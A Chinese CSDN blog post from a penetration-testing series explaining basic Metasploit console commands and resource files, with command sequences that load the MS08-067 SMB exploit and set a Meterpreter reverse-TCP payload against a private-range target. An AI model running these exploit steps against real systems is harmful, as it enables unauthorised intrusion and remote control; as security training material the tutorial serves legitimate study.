5-渗透攻击之旅

最新推荐文章于 2022-09-09 10:01:40 发布
最新推荐文章于 2022-09-09 10:01:40 发布
阅读量503 收藏 1
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chengyu779394084/article/details/50605493
版权

一、渗透攻击基础
Metasploit框架中包含数百个模块,在MSF终端中运行show命令会将所有的模块显示出来。

1、msf>show exploits
显示Metasploit框架中所有可用的渗透攻击模块。
Metasploit团队不断开发新的渗透攻击模块,不断更新

2、msf>show auxiliary
显示所有的辅助模块以及它们的用途。

3、msf>show options
当选择一个模块后输入,会列出所有这个模块所需的参数。
没有选择任何模块,则会显示所有的全局参数。

输入back命令,返回到Metasploit的上一个状态。

msf>use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi)>back
msf>

想要查看某个特定的渗透攻击、辅助或攻击载荷模块时,使用search命令。

发起一次针对SQL数据库的攻击。

msf>search mssql

寻找和ms08_067_netapi漏洞相关的模块。

msf>search ms08_067_netapi

找到攻击模块后,使用use命令加载。

msf>use windows/smb/ms08_067_netapi

Notice:无论在哪个模块运行,都可以使用search和use跳转到另一个模块。

4、msf>show payloads
当在当前模块下输入,Metasploit只会将与当前模块兼容的攻击载荷显示出来。
未选择模块,命令显示所有处于活动状态的攻击载荷。

Metasploit会根据环境识别出可在一次特定的渗透攻击中使用的攻击载荷。

msf exploit(ms08_067_netapi)>show payloads

这里写图片描述

设置要使用的payload

msf exploit(ms08_067_netapi)>set payload windows/shell/reverse_tcp
msf exploit(ms08_067_netapi)>show options

这里写图片描述

Payload options显示了攻击载荷详细信息。

5、msf>show targets
Metasploit的渗透攻击模块能够列出受到漏洞影响目标系统的类型(包括补丁级别、语言版本、安全机制等)

msf exploit(ms08_067_netapi)>show targets

这里写图片描述

ID 0–自动选择目标,攻击目标列表中的一个选项。

6、setg和unsetg
对全局参数进行设置或清除。

7、save
setg读对全局参数进行设置后,使用save进行保存。

msf exploit(ms08_067_netapi)>setg RHOST 192.168.1.0
msf exploit(ms08_067_netapi)>save

二、第一次渗透攻击
三、Ubuntu渗透攻击
四、全端口攻击载荷
五、资源文件
MSF终端内包含一系列自动化命令的脚本文件。实际是可以在MSF终端执行的命令列表,列表中的命令按顺序执行。

resource命令载入资源文件,或在OS命令行环境使用-r标志资源文件作为MSF终端的一个参数进行传递

创建显示Metasploit版本,载入声音的资源文件:

root@bt:/opt/framework3/msf3/ echo version>resource.rc
root@bt:/opt/framework3/msf3/ echo load sounds>>resource.rc
root@bt:/opt/framework3/msf3/ msfconsole -r resource.rc

version和load命令被写入资源文件,-r将资源文件载入。
结果:
这里写图片描述

自动化对某个主机发起攻击的资源文件,autoexploit.rc。

root@bt:/opt/framework3/msf3/ echo use windows/smb/ms08_067_netapi>autoexploit.rc
root@bt:/opt/framework3/msf3/echo set RHOST 192.168.1.155 >>autoexploit.rc
root@bt:/opt/framework3/msf3/echo set PAYLOAD windows/meterpreter/reverse_tcp >>autoexploit.rc
root@bt:/opt/framework3/msf3/echo set LHOST 102.168.1.101>>autoexploit.rc
root@bt:/opt/framework3/msf3/echo exploit>>autoexploit.rc
root@bt:/opt/framework3/msf3/msfconsole

msf>resource autoexploit.rc

结果:
这里写图片描述

chengyu779394084
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
062-渗透测试之自力更生.pdf
09-20
062-渗透测试之自力更生.pdf
渗透攻击个人分析.docx
03-23
渗透移动网络攻击主要是在泛指非法利用移动手机通信客户端本身依然存在的手机操作系统安全保护层和地下移动网络应用层上的网络数据安全漏洞,以非法间接窃取地下移动网络上的移动虚拟机和移动资产配置信息等作为主要网络攻击活动目的,由成熟的地下移动网络安全经济链所直接攻击驱动,至今已在中国万维网上泛滥成灾。
火狐浏览器-渗透专版(便携)
04-24
火狐浏览器,是Mozilla开发的一款网页浏览器。火狐浏览器使用Gecko排版引擎,支持多种操作系统,包含隐私保护、分页浏览、全球通用、智能地址栏等性能。 Firefox 46.0 渗透便携版 T00LS beta3 2.zip 在火狐浏览器上加载了渗透测试需要所使用的插件,非常的全面,非常实用,也非常的好用,非常的方便。安全便捷。
网络安全-渗透完整笔记
03-27
网络渗透是一种攻击手段,也是一种综合的高级攻击技术,也被成为“渗透测试” [3]。渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法,包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞 [3]。换句话来说,渗透测试是指渗透人员在不同的位置(比如从内网、从外网等位置)利用各种手段对某个特定网络进行测试,以期发现和挖掘系统中存在的漏洞,然后输出渗透测试报告,并提交给网络所有者。渗透测试的目的是为了检测企业的安全防范中还有什么漏洞 [1]。渗透测试可以分为黑盒、白盒和灰盒三种,其中在项目中大多数以黑盒和白盒为主 [1]。黑盒测试是模仿真实环境下的黑客攻击攻击者对项目从一无所知到逐步渗透,需要攻击者有较高的技术水平,时间消耗的也可能比较长,攻击者只要找到该企业的一个漏洞并以低成本高效率的拿下项目的权限,黑盒测试可以检测项目团队的对入侵的防范能力和被入侵时间的应对能力。
kali msfconsole命令详解以及靶机攻破实战
weixin_31501115的博客
09-09 8774
msfconsole靶机攻破实战,简称msf是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种渗透文件,利用网站,手机等的漏洞将到目标靶机,操控目标靶机…这边仅供学习使用msfconsole注:默认kali 预装了metasploit-framework,即msfconsole命令,如果没有或提示:-p, –payload < payload > 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的。
ExploitExercises_Nebula_Level01
小黑话不多
12-26 1375
题目源码如下: #include #include #include #include #include int main(int argc, char **argv, char **envp) { gid_t gid; uid_t uid; gid = getegid(); uid = geteuid(); setresgid(gid, gid, gid);
088-一次迂回的渗透测试之旅.pdf
09-20
088-一次迂回的渗透测试之旅.pdf
MSFconsole工具】下载、启动方法、msf常用基础命令、模块功能、核心命令(入门初识)
02-11 6248
MSFconsole】初识
关于Metasploit-学习笔记-基础命令以及参数
weixin_34190136的博客
09-13 1155
Metasploit官网 原文链接:http://www.freebuf.com/tools/67685.html1、官网内容很多,但是都是一些英文。2、有Windows平台的安装,也有Linux平台的。总之就是基于pc的安装。3、在命令行窗口输入msfconsole可以直接进入Metasploit这个工具的工作环境。4、Msfconsole的系统文件和用户文件位于/usr...
MSFconsole进阶】auxiliary模块:信息收集、扫描、嗅探、指纹识别、口令猜测和Dos攻击
05-22 3866
渗透工具】MSFconsole:auxiliary模块
4-漏洞扫描
Cherryuuuu
01-28 8924
漏洞扫描器 NeXpose Nessus
2-Metasploit基础
Cherryuuuu
01-27 1064
Metasploit 渗透测试 exploit payload shellcode
6-Meterprter
Cherryuuuu
02-05 892
Meterpreter 后渗透攻击
3-情报搜集
Cherryuuuu
01-28 634
nmap whois 端口扫描 扫描器
1-渗透测试技术基础
Cherryuuuu
01-27 605
渗透测试 执行标准
Lan仿朋友圈系统开源,可用于表白墙等微商相册,商品图册等.rar
04-30
Lan仿朋友圈系统开源,可用于表白墙等微商相册,商品图册等.rarLan仿朋友圈系统开源,可用于表白墙等微商相册,商品图册等.rar
C++基础辅助类库.zip
04-30
比如异步进行-Thread,安全句柄-CHandle,资源守卫-Guard,XML解析-rapidxml,以及其他注册表、文件基础操作。用于更加高效、安全的进行C++开发。温馨提示:至少需要支持C++0x标准的编译器。
集团企业IT技术架构规划方案qy.pptx
最新发布
04-30
集团企业IT技术架构规划方案qy.pptx
CISP-PTE攻击
08-15
CISP-PTE攻击机是一个专门设计用于CISP-PTE认证考试的虚拟攻击环境。它提供了一系列的安全漏洞和实际场景,供考生进行实践和评估,以检验他们在网络渗透测试方面的能力。 攻击机通常包含了各种类型的漏洞,包括但不...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值